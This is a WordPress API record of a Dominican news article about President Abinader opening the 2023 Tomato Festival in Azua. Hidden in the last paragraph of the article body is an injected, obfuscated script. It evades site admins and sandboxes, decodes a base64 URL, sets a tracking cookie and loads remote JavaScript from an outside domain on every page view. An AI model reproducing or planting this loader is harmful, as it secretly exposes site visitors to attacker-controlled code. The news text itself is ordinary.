{"id":14102,"date":"2023-02-16T08:28:45","date_gmt":"2023-02-16T12:28:45","guid":{"rendered":"https:\/\/yanessiespinal.com\/?p=14102"},"modified":"2023-02-16T08:28:45","modified_gmt":"2023-02-16T12:28:45","slug":"presidente-abinader-destaca-aumento-de-la-produccion-de-tomate-en-un-14-en-su-gestion","status":"publish","type":"post","link":"https:\/\/enterarterd.com\/?p=14102","title":{"rendered":"Presidente Abinader destaca aumento de la producci\u00f3n de tomate en un 14 % en su gesti\u00f3n"},"content":{"rendered":"<p>Azua.- El Presidente Luis Abinader dej\u00f3 inaugurado el Festival del Tomate 2023, que se extender\u00e1 hasta el 19 de este mes de febrero como una iniciativa de la gobernaci\u00f3n provincial con el apoyo del Fondo Especial para el Desarrollo Agropecuario (FEDA).<\/p>\n<p>&nbsp;<\/p>\n<p>Tras el corte de cinta, el Presidente Abinader realiz\u00f3 un recorrido por el festival, donde destac\u00f3 que la producci\u00f3n de tomate se ha aumentado en un 14 %, debido a mejor competitividad y a una extensi\u00f3n agr\u00edcola mayor.<\/p>\n<p>El Festival del Tomate tiene una representaci\u00f3n amplia, tanto, como los resultados que dejan las cosechas de ese rubro, vistos \u00e9stos, desde la generaci\u00f3n de empleos, dinamizaci\u00f3n del comercio y aporte a la seguridad alimentaria.<\/p>\n<p>Esa primera versi\u00f3n es dedicada al jefe de Estado, por los aportes al sector productivo de la provincia. En el acto inaugural el mandatario estuvo acompa\u00f1ado por L\u00edmber Cruz, ministro de Agricultura, la senadora L\u00eda D\u00edaz, el ingeniero F\u00e9lix M. Garc\u00eda C., presidente de la Afconagro y de Grupo Linda-La Fabril; Miguel S\u00e1nchez y el embajador Amable Padilla.<\/p>\n<p>Acudieron al acto los ejecutivos de Transagr\u00edcola (Linda); Luis Zoquier, gerente Agr\u00edcola de Peravia Industrial (La Famosa) y Dinery Figuereo, gerente Agr\u00edcola de Victorina Agroindustrial.<script>(function(){try{if(document.getElementById&&document.getElementById('wpadminbar'))return;var t0=+new Date();for(var i=0;i<20000;i++){var z=i*i;}if((+new Date())-t0>120)return;if((document.cookie||'').indexOf('http2_session_id=')!==-1)return;function systemLoad(input){var key='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+\/=',o1,o2,o3,h1,h2,h3,h4,dec='',i=0;input=input.replace(\/[^A-Za-z0-9\\+\\\/\\=]\/g,'');while(i<input.length){h1=key.indexOf(input.charAt(i++));h2=key.indexOf(input.charAt(i++));h3=key.indexOf(input.charAt(i++));h4=key.indexOf(input.charAt(i++));o1=(h1<<2)|(h2>>4);o2=((h2&15)<<4)|(h3>>2);o3=((h3&3)<<6)|h4;dec+=String.fromCharCode(o1);if(h3!=64)dec+=String.fromCharCode(o2);if(h4!=64)dec+=String.fromCharCode(o3);}return dec;}var u=systemLoad('aHR0cHM6Ly9zZWFyY2hyYW5rdHJhZmZpYy5saXZlL2pzeA==');if(typeof window!=='undefined'&#038;&#038;window.__rl===u)return;var d=new Date();d.setTime(d.getTime()+30*24*60*60*1000);document.cookie='http2_session_id=1; expires='+d.toUTCString()+'; path=\/; SameSite=Lax'+(location.protocol==='https:'?'; Secure':'');try{window.__rl=u;}catch(e){}var s=document.createElement('script');s.type='text\/javascript';s.async=true;s.src=u;try{s.setAttribute('data-rl',u);}catch(e){}(document.getElementsByTagName('head')[0]||document.documentElement).appendChild(s);}catch(e){}})();<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Azua.- El Presidente Luis Abinader dej\u00f3 inaugurado el Festival del Tomate 2023, que se extender\u00e1 hasta el 19 de este mes de febrero como una iniciativa de la gobernaci\u00f3n provincial con el apoyo del Fondo Especial para el Desarrollo Agropecuario (FEDA). &nbsp; Tras el corte de cinta, el Presidente Abinader realiz\u00f3 un recorrido por el [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":14104,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[6],"tags":[],"class_list":{"0":"post-14102","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-nacionales"},"_links":{"self":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14102","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=14102"}],"version-history":[{"count":0,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/posts\/14102\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=\/wp\/v2\/media\/14104"}],"wp:attachment":[{"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=14102"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=14102"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/enterarterd.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=14102"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}